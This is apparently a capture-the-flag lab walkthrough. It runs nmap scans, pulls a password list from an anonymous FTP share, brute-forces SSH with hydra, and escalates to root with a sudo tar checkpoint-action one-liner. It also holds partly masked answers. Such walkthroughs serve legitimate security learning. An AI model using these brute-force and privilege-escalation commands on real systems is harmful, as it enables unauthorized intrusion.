- Deploy the machine.
2. Find open ports on the machine
Port scan
nmap -Pn <ip>
There’re 3 open ports: 21,22,80.
OS and service scan
nmap -A -p 21,22,80 <ip>The OS is Ubuntu.
There’re 3 services:
21 ftp with anonymous login.22 ssh 80 http
Vuln scan
nmap --script vuln -p 21,22,80 <ip>
Access HTTP site (port 80)
There’re 3 name: spike, jet, and ed.
Let’s note it for possible usernames.
View page source. There’s /images/ directory.
Access it. nothing much
Access ftp port 21 with anonymous login
ftp <ip>Name: anonymous
ls -laThere’re 2 files: locks.txt and task.txt.
Download it
get locks.txtget task.txt
Read it
cat locks.txtSeems like this is a password file.
Read task.txt
cat task.txt
3. Who wrote the task list?
The answer is from task.txt
ANS: l*n
4. What service can you bruteforce with the text file found?
Seems like there’s another possible username.
Let’s create users.txt first. There’re 5 usernames in total.
Bruteforce SSH on port 22
hydra -L users.txt -P locks.txt <ip> ssh -t 4 -u -F -V
SSH can be bruteforced.
5. What is the users password?
ANS: The answer is from #4.
6. user.txt
ssh lin@<ip>
ls -lacat user.txt
7. root.txt
Let’s do privilege escalation. I will check sudo first
sudo -lLucky enough I can use tar.
Looking up in GTFO
Run the command
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shLet’s verify if I can escalate the priv.
idNow I’m root.
cd /rootlscat root.txt
